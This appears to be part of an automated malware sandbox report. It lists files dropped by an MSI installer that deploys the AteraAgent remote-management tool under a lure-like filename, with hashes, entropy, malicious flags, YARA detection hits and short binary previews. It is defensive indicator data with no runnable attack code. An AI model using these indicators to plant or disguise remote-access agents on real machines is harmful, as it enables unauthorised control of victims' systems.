                                                                                                                                                                                                                                        SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):437365
                                                                                                                                                                                                                                        Entropy (8bit):6.648219007267441
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:8t3jOZy2KsGU6a4Ksht3jOZy2KsGU6a4KsD:MzOE2Z34KGzOE2Z34K4
                                                                                                                                                                                                                                        MD5:CABE58A24CD2FC0A9BF411587DEAFAEF
                                                                                                                                                                                                                                        SHA1:782A8FA5E9D73ACAE70F652E182580E3B4877D05
                                                                                                                                                                                                                                        SHA-256:517332179E665D408C76F330EB61E698B4D3B079721D128C136889FE41C83E96
                                                                                                                                                                                                                                        SHA-512:FD779EDE138F235187CEF248B687D927BFCE5888A8C141D56A2DBA8AD6F7ABD9E0EEE964627670BCCA0EE70DC3DF5A3AA79B9B4E523DB29953929251A45E08AE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIBB81.tmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@<OBY.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent,.TRABALHO----PROCESSO0014S55-S440000000S1.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<.........................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25600
                                                                                                                                                                                                                                        Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                        MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                        SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                        SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                        SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSID8C1.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1538
                                                                                                                                                                                                                                        Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                        MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                        SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                        SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                        SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):184240
                                                                                                                                                                                                                                        Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                        MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                        SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                        SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                        SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):711952
                                                                                                                                                                                                                                        Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                        MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                        SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                        SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                        SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61448
                                                                                                                                                                                                                                        Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                        MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                        SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                        SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                        SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):435996
                                                                                                                                                                                                                                        Entropy (8bit):6.651601195957652
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:2t3jOZy2KsGU6a4Ksht3jOZy2KsGU6a4Kse:2zOE2Z34KGzOE2Z34K5
                                                                                                                                                                                                                                        MD5:630728BB55B0B09C19DAD1BCE44EC857
                                                                                                                                                                                                                                        SHA1:1011860A55E59759757EF104802BD7435725D7EC
                                                                                                                                                                                                                                        SHA-256:4EBF2091B2634BFBB31DA43EED63F5675058A1BA8A550367534CE7F0577818EF
                                                                                                                                                                                                                                        SHA-512:66C522E1DC98183CDB518A88046FD452FB2EA413A0A2D680F542049A42D6B1C506F997A12D98A832E678CF3B6F94E8C80FCCACEF161AFD2DE17FEF822F85A7CF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIDBBE.tmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@dOBY.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent,.TRABALHO----PROCESSO0014S55-S440000000S1.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........InstallInitialize......&.{18F64F52-CE08-434F-A5F1-7A8A39D59EEA}....&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}c.&.{18F64F52-CE08-434F-A5F1-7A8A39D59EEA}............StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P...................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.1739667768203184
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:JSbX72FjZSAGiLIlHVRpUh/7777777777777777777777777vDHF7DRONN/Xl0i5:JbSQI5ERRqF6F
                                                                                                                                                                                                                                        MD5:8F4A2611379BD461E5E0783C8CAC9C05
                                                                                                                                                                                                                                        SHA1:2F689104750D0679CDE9321C44D24C1BE739998E
                                                                                                                                                                                                                                        SHA-256:FAA66AC437A84F4FC067EC0D6744A4F9BFF88637423E6A6A6CD63C815B4258A7
                                                                                                                                                                                                                                        SHA-512:1CA6948F2B7B57480EB808AB3E2BF4FC267CB539F9363E7A6E9D0E5D5CFE896DD27AA6B0272412B4BD3F05DCDE05262B7FC9BEC99AFF7BAC04220B7E15160D16
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.1754640634326148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:JSbX72Fj1mSAGiLIlHVRpUh/7777777777777777777777777vDHF2Vt/Xl0i8Q:JuSQI5E2l6F
                                                                                                                                                                                                                                        MD5:5A9D668490742D7540FD57980A0C579F
                                                                                                                                                                                                                                        SHA1:842D327064DFADF39BC9FEE8BA66B651BC6E148D
                                                                                                                                                                                                                                        SHA-256:FD1B2FCCEABD298195FB23A6FCAA4C9842BE0593C55F84AFA31345506E4EDF50
                                                                                                                                                                                                                                        SHA-512:9C6CAC0772C34AE2AC13EF66D7B44ABBB53432FD4F601E259E8CC798C25ECAFAEA0C5C779A705A3328FB7FAA8055D2D73B7DB2B6E491E663AF3DA12E623D959F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.172589133487772
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:JSbX72FjuAGiLIlHVRpIh/7777777777777777777777777vDHFzTPrfWrl0i8Q:JUQI5wBTr/F
                                                                                                                                                                                                                                        MD5:CFA2CD2FAB0EC5DBB80D33743064900D
                                                                                                                                                                                                                                        SHA1:434FD5BAF2B5282985FE625FECED07073393E1CD
                                                                                                                                                                                                                                        SHA-256:AD77CD7D2801E18D0159C9009D09E41CF324528153FE58C5FA424370E5B0F43C
                                                                                                                                                                                                                                        SHA-512:3E5D7BFEFADC3438C6AC3CBE586D055D00F62866743CC74122DF7DF6BE64FE6ED52596FF31C3B520B1C16A5DCE1EB87859BFE25EC06A42F8D15B4A588CB4422B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.1718511608690974
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:JSbX72FjdAGiLIlHVRpph/7777777777777777777777777vDHFN1P0onWl0i8Q:JTQI5dqorF
                                                                                                                                                                                                                                        MD5:38ABFA695EE09E39044E0F634F587D33
                                                                                                                                                                                                                                        SHA1:5E60E7D44DFB4900CE6A3C9E4E6968659E53622B
                                                                                                                                                                                                                                        SHA-256:0B3CF480B0B1ABF2738F30F203B1A340B8B2A4C6F24FD4120B6D5DB95FB222B3
                                                                                                                                                                                                                                        SHA-512:E4542A69CA238C11AF8C29DD9D6EC288FEA4601B3ECA8F9BDB46CDEDB1EE6700DCC806057D5690E17D677EC173CC905E642925618D2CF737ED7D6BD2FF785456
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.1804187676021298
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:JSbX72FjKSAGiLIlHVRp/h/7777777777777777777777777vDHF6oe7tuYaBoIk:JXQI57soemob8F
                                                                                                                                                                                                                                        MD5:7397ACC06919DAC17B2E0028DA08D3E2
                                                                                                                                                                                                                                        SHA1:E3391C06DBC0D060478A0D22FBBD42FED4015DD3
                                                                                                                                                                                                                                        SHA-256:332648007602B9B91C9984D3B30A8E6C9AC3BDE99DC9E2BEB106B86586D9FF0C
                                                                                                                                                                                                                                        SHA-512:62E0913897DC17DD6BB20DC18C57ADE164000D375AE931EA72F2F074B932825B3951571B818985C67BA1468B7066BCAB11C7B893A3F03B72AC3EB6620AA7E00D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.6094349994868145
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:l8PhmuRc06WXzAFT5od/8BaSjndd4d/EqdcrGbQySsndd4dNWeUJCQ:Ihm11FTq/8Ba9ZcyNXezQ
                                                                                                                                                                                                                                        MD5:5352E3DE4E5267D3CF34CF77FFDBA888
                                                                                                                                                                                                                                        SHA1:B3CEA9DE058F989D22C8F61ED66B2A6D0F10369F
                                                                                                                                                                                                                                        SHA-256:E1B03A636C107D82092D7DD63B0865624ABFCF08C44446CA062C2B6241E0B676
                                                                                                                                                                                                                                        SHA-512:53A1CE13B64ACEC9F6BB34FE3F869E448ED5010CA0A0B0F29181B54FBDB52550ADC46B3ACC4AA886900D500372D92F7CFDC167742819EF106ACF8A3081FF9A2B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):360001
                                                                                                                                                                                                                                        Entropy (8bit):5.362976518960195
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaud:zTtbmkExhMJCIpEk
                                                                                                                                                                                                                                        MD5:5CCA446E37B586FE91C0C55C904647DE
                                                                                                                                                                                                                                        SHA1:DBB186BCF92CABE7090ED292F468776548DF3EB6
                                                                                                                                                                                                                                        SHA-256:552C7C857D41AC1B88E1B47FD9F5625C569032B95FDA2ECB2D44B4FEFB3CFB7D
                                                                                                                                                                                                                                        SHA-512:18581AFEF4380DF870D71D71F0D139ABCF0A43CC89BA379B83D3FE07F9454E0C74C6D45BBFA87CEE4D759428E9925094905E36884CA9B37447C1FE3B864E35BC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):704
                                                                                                                                                                                                                                        Entropy (8bit):4.805280550692434
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:tIDRFK4mAX7RBem7hccD+PRem7hUhiiGNGNdg6MhgRBem7hccD+PRem7hUGNGNkm:Us43XVBVhcmMRVhMipNVeBVhcmMRVhro
